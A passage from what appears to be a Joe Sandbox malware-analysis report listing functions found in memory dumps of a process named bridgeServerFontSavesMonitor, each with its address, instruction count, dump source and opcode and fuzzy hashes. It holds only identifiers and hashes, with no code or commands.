                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 446c6698018bd0aadcd082627104667de6e52e29fbd767b9c9c0287d0e2fe7c3
                                                            • Instruction ID: 6775719ba2f3a3f281a63fb639520fd0c01e09f134ad3780dedecd889a2359cc
                                                            • Opcode Fuzzy Hash: 446c6698018bd0aadcd082627104667de6e52e29fbd767b9c9c0287d0e2fe7c3
                                                            • Instruction Fuzzy Hash: 89E03061F1A81E5FE6B0BB8880643B812D1EB6CB10F4A4172C40ED32A1DDB86D014385
                                                            Function 00007FFD9BAD3DB2 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ea42b2bb606dda0b010934ce95ebc77e2adcc2d4a1b94e97b6914bb1a7df75e
                                                            • Instruction ID: 27af88a063b7ef7b7908f24d13ab54287fcd58814ffefc222166b941b50f7023
                                                            • Opcode Fuzzy Hash: 4ea42b2bb606dda0b010934ce95ebc77e2adcc2d4a1b94e97b6914bb1a7df75e
                                                            • Instruction Fuzzy Hash: 09F01D30E1951E8BEB58EB84D864ABD72A1FF54314F01063ED416D7299DBB466008A40
                                                            Function 00007FFD9BAC3C45 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 243261e8d1098a7afa7f2707c5edd33ad9c3c86006d615b9f063650293f623f5
                                                            • Instruction ID: b4c6266c8e48bd59eff9bc684a75c1199843e97fa6419dd1c7c22ad235104e6d
                                                            • Opcode Fuzzy Hash: 243261e8d1098a7afa7f2707c5edd33ad9c3c86006d615b9f063650293f623f5
                                                            • Instruction Fuzzy Hash: 7BE09A21F1AC2D5FE6B4FB4C80293BC22D2EBAC710F460176C00EC32A2DDB82E424785
                                                            Function 00007FFD9BAC0D01 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 189b01c8f967fc67d0d10a0456a0b976cd0d14527ff1d71b1a547067b1ecba70
                                                            • Instruction ID: f2a3258953b762ae58eeede28478c615e965742f5f2cd6ba5ad0035f71aa32ce
                                                            • Opcode Fuzzy Hash: 189b01c8f967fc67d0d10a0456a0b976cd0d14527ff1d71b1a547067b1ecba70
                                                            • Instruction Fuzzy Hash: 72F0B430B0D64E8EE768EB64C4906BD77E0AF54711F14417AD009C32E6DA786680CA44
                                                            Function 00007FFD9BAEE749 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb6921dbeb3ce898b881a1b1af141a6eb40599e2aa10bed43c4a01d136d6323e
                                                            • Instruction ID: 6fea124b7c2609e1e42c561a800961a4925cc51ef64ca45e406bcd8b121d0402
                                                            • Opcode Fuzzy Hash: eb6921dbeb3ce898b881a1b1af141a6eb40599e2aa10bed43c4a01d136d6323e
                                                            • Instruction Fuzzy Hash: 59E0927160E3C44FCB16EA3488688557FA0EF6B21174A41EEC046CF2A7EA2DCC85CB11
                                                            Function 00007FFD9BAED639 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fbfbd30a557effa5a1f4c238effb533736f487951f6ae0ca9abc9833238a0df1
                                                            • Instruction ID: b71520877707e7fa63769699bcf1acb03c740b69a6d2746f4f4d68533352fe04
                                                            • Opcode Fuzzy Hash: fbfbd30a557effa5a1f4c238effb533736f487951f6ae0ca9abc9833238a0df1
                                                            • Instruction Fuzzy Hash: 96E09271A4A3C44FCB16AA348868454BFA0EF6720174A52FEC046CF2A7EA2DC886C701
                                                            Function 00007FFD9BAC10C0 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f4a6cb9737d9705ba08b95aee8fa6837228f1318e145d83829f04bd12107763
                                                            • Instruction ID: 6192a1bc619b3b02a9734998f9c0a23a7882829bc4534538c425b854e3975304
                                                            • Opcode Fuzzy Hash: 0f4a6cb9737d9705ba08b95aee8fa6837228f1318e145d83829f04bd12107763
                                                            • Instruction Fuzzy Hash: 0EE02621B5D85906EBBCB67468B25B17280DB89334B0506B9D01AC62DACC595CC14281
                                                            Function 00007FFD9BAF2049 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 344c34409fb12aaf9034b2d540c0cb5abf031cfedf5ad41746b943d0d6c8cb70
                                                            • Instruction ID: e1df41ce4b3ebec57643cc7a9a76b473b854f5c112f0923f8b53f51e08b914da
                                                            • Opcode Fuzzy Hash: 344c34409fb12aaf9034b2d540c0cb5abf031cfedf5ad41746b943d0d6c8cb70
                                                            • Instruction Fuzzy Hash: 20E0927164E3C08FCB16EB3484688547F60EE6720174A42EEC446CF2A7EA2DC886C711
                                                            Function 00007FFD9BAE9339 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d78b74fcd8fa0f2c37ab9e8f5d2d9e8a45a0f452e6b07ba804f7464576df84ed
                                                            • Instruction ID: 850c768f288621bfd64b4b998a71f9faa643c16fe62cd97174e2669ab70bbcdb
                                                            • Opcode Fuzzy Hash: d78b74fcd8fa0f2c37ab9e8f5d2d9e8a45a0f452e6b07ba804f7464576df84ed
                                                            • Instruction Fuzzy Hash: E9E04F21A0A7C44FC70A97388C699503FB0EE6B21178F00DBD045CB5F3E519DC48C712
                                                            Function 00007FFD9BAF8509 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 810936c5e8ec2e624f269aeac36d93d12a5a9a43f4435756d123705e48987b8a
                                                            • Instruction ID: dbaf4e7869f09bf42f8ced414a81183fb2e2f24bd9e46ea1c1f6fd5120822f39
                                                            • Opcode Fuzzy Hash: 810936c5e8ec2e624f269aeac36d93d12a5a9a43f4435756d123705e48987b8a
                                                            • Instruction Fuzzy Hash: 4FE01A7154E3C44FCB06AB7488658553FA09E6B21078B40EEC185CF1B3E62D8949C701
                                                            Function 00007FFD9BAD453E Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction ID: 5076f2f3662c58d76b691443f69e215c777f5f1ace16fe46c5ebec0fcdc110a3
                                                            • Opcode Fuzzy Hash: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction Fuzzy Hash: EFE04F3270EC0E8AF771A75888645BE3252ABD0322B164335C01EC31E5DEACEB068681
                                                            Function 00007FFD9BAFA7E0 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD9BAFA750 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD9BAFDCF9 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c86fded1930a1f603ba335a5ee18e657c5ad2e83db752248d3747d970606636
                                                            • Instruction ID: 9713601686de56f99d46f056a9ef4fae23ddfa95840f0701623eac1a27ef7273
                                                            • Opcode Fuzzy Hash: 1c86fded1930a1f603ba335a5ee18e657c5ad2e83db752248d3747d970606636
                                                            • Instruction Fuzzy Hash: C9E04F2154F3C44FC70B973088788503F609E1721074A41EAC145CF2B3E9298C49C712
                                                            Function 00007FFD9BAE9189 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0aa733bbe95b4f402a5168598b0d167bf7600790ef9767f2e70ad8ed3d05f3af
                                                            • Instruction ID: a3c1f2b569e3ae8eb1933fa5ff41021ed2e9bd8d8dddacb3314d1d4897e574de
                                                            • Opcode Fuzzy Hash: 0aa733bbe95b4f402a5168598b0d167bf7600790ef9767f2e70ad8ed3d05f3af
                                                            • Instruction Fuzzy Hash: 57E01A7154A3C04FCB06AB7488A99443FB0AE6B21078E41DEC04ACF1B3E62D8949C701
                                                            Function 00007FFD9BAF9619 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 41fe43c65c7414e98c21418380f3e6dc5b9a020a0dc282fe106c742bab5957b8
                                                            • Instruction ID: c8c378fc38d94044646397e189844600d946c0dd9b4a1e22f3f1b4ad89a0aebe
                                                            • Opcode Fuzzy Hash: 41fe43c65c7414e98c21418380f3e6dc5b9a020a0dc282fe106c742bab5957b8
                                                            • Instruction Fuzzy Hash: ABE0177190A7884FC74A9B3488A99803FB0EE6B21178B01C7D045CF5B3EA5D8D89C752
                                                            Function 00007FFD9BAF8079 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d31fa697f5e44a0111269a3430acab1cb1bcd2aacb62210cce70f3a499f91b1f
                                                            • Instruction ID: d32185705cd2da419cb85299d93dd1da11d3d7e2c48b8f2930a3cde888bebab2
                                                            • Opcode Fuzzy Hash: d31fa697f5e44a0111269a3430acab1cb1bcd2aacb62210cce70f3a499f91b1f
                                                            • Instruction Fuzzy Hash: AFE04F2154F3C04FC70B973088B88547F60DE2B21038A40EEC145CF2B3E5298D49C702
                                                            Function 00007FFD9BAFDC79 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction ID: 65aec5663ad2742d356b1a54043c2dd432b3c2062ecb00ab5a9225a1fa98eef4
                                                            • Opcode Fuzzy Hash: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction Fuzzy Hash: 6AE04F2154E3C44FC70B973088788503F609E2721078A41EEC145CF2B3E6298849C702
                                                            Function 00007FFD9BAC6A11 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: 1e7ea4726f0590c06b16de3dc9349bf9a163589073d4b6c201e5a33f5b902515
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: 51E01220F0901E4BFBB4B794C8607B962A1AF94300F1240B4D80D933E2DDB86F814749
                                                            Function 00007FFD9BAC5384 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: ed0e61b198001209f818b04ed4d54ac883336c0034daeb39cc2ad2099b5da0ca
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: 47E0EC24F0A80E8FEEA4FBA880786B822C29F54710F0A40B4E40DC72B2DDA8A9014704
                                                            Function 00007FFD9BAE5482 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89f6b807177e1225d16e7df19c848799da2258c7ea209a9a332e77e5e1de8161
                                                            • Instruction ID: 37edc7076fc4c2e28668e714698bc654a96485dc4b70f56e8cf4b7ad10628b33
                                                            • Opcode Fuzzy Hash: 89f6b807177e1225d16e7df19c848799da2258c7ea209a9a332e77e5e1de8161
                                                            • Instruction Fuzzy Hash: 23C0121275E81D0A7598B15C38521F883C2D7C813571513F3E00DC328ADC0A598302C4
                                                            Function 00007FFD9BAF20F0 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Function 00007FFD9BAFBDE0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction ID: fc53cdff608347623775037792c106689762831bf29b6ef07b9df21540533fd9
                                                            • Opcode Fuzzy Hash: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction Fuzzy Hash: 13D02230B509040FC70CA73888588703790EB6A202B8200A8D00AC72B1D9AADC89C741
                                                            Function 00007FFD9BAF75B8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction ID: 93ada8c3559bb867e47995193bd0202fb733a6a8fa3329ca9ccae7e0f10ffa3a
                                                            • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction Fuzzy Hash: 9BD01234B519044FCB1CA7388859C747791EBAA216BD540A9D00AC73B1D96ADD89C741
                                                            Function 00007FFD9BAC0835 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e936795df280284fbe1680a90c07a03b5b2cd9b3a8fad33150715f2f2d6be2e3
                                                            • Instruction ID: 4129fd0d51a785f1061e2ea5148f07247befa67b87b118e53b1d9063a8df5a84
                                                            • Opcode Fuzzy Hash: e936795df280284fbe1680a90c07a03b5b2cd9b3a8fad33150715f2f2d6be2e3
                                                            • Instruction Fuzzy Hash: 93C01214B5740D51D03473AEEC664F97740AF48118F864171E40D85096DC491587C2DA
                                                            Function 00007FFD9BAC0B9D Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 050d8e8814590b799ee996d36945032e3fad8cecaae2ead40cbd6cb78caa5bea
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 2EC0123062A80E8FDA80BB28C889824BBA0FB0E201BDA00E0E00CC71A1D65A98908700
                                                            Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 2234e022e19ea5219197fb4616ed885ec4011342f418d6e6b18645ffdf65eab9
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: 3FC08C00F0F40F40F83037EE14220BCB1005BC4A10FD30132D04C820E19CDE22C5418E
                                                            Function 00007FFD9BAC308E Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73ef918897a28a046fa25eb39959af67a0da31d7b18ff15a8c18fd550651f5eb
                                                            • Instruction ID: 1371e74155b0f91854bca2e2a6cd2e91ec6028f4eb97be708c9d60db2fe2fc1b
                                                            • Opcode Fuzzy Hash: 73ef918897a28a046fa25eb39959af67a0da31d7b18ff15a8c18fd550651f5eb
                                                            • Instruction Fuzzy Hash: B7C01210F2AD0E0BEEFCB3B480352FD00C26F48B00F660434D00ED32E2DCAC2A404A84
                                                            Function 00007FFD9BAD7D6E Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc3f8e72630c80a729c6a5733f170a9b71b42a4221c4276c24c4315fbdda3be2
                                                            • Instruction ID: 209770f3f9a3f57c00c020382ae85afd256a65f6a4c24d2cb60b502e3045faf9
                                                            • Opcode Fuzzy Hash: cc3f8e72630c80a729c6a5733f170a9b71b42a4221c4276c24c4315fbdda3be2
                                                            • Instruction Fuzzy Hash: 24D0C930E09618CEEBA0DB64C851B68B7B2FF48310F5002F6C01DE22CACB356D819B40
                                                            Function 00007FFD9BAC34BF Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70a636803c2d19e658c225ad7ceb6835a3a10cf9637c049eb9b1d0e7cc11ff4b
                                                            • Instruction ID: 736bfa4a546e3fc1d6b711c3216dfa05c0558b644aee6c430225745e7267d948
                                                            • Opcode Fuzzy Hash: 70a636803c2d19e658c225ad7ceb6835a3a10cf9637c049eb9b1d0e7cc11ff4b
                                                            • Instruction Fuzzy Hash: 4CC04C01F1DC2A07E25976144C3567E44535F94729FD902B4E41F873DECD5D5E0206C6
                                                            Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
